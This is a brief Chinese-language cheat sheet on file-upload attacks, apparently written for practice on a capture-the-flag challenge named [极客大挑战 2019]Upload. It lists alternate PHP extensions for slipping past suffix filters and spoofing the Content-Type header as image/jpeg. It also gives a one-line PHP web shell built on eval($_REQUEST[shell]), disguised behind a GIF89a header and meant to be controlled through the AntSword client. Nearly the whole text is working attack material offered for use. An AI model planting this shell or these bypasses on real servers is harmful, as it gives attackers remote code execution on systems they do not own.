文件上传常用姿势 1、后缀检测 某些情况下后缀名绕过:php、php3、php5、phtml、pht 2、常用一句话 GIF89a? <script language="php">eval($_REQUEST[shell])</script> 3、文件类型绕过 Content-Type:image/jpeg 等等 例题:[极客大挑战 2019]Upload 蚁剑连接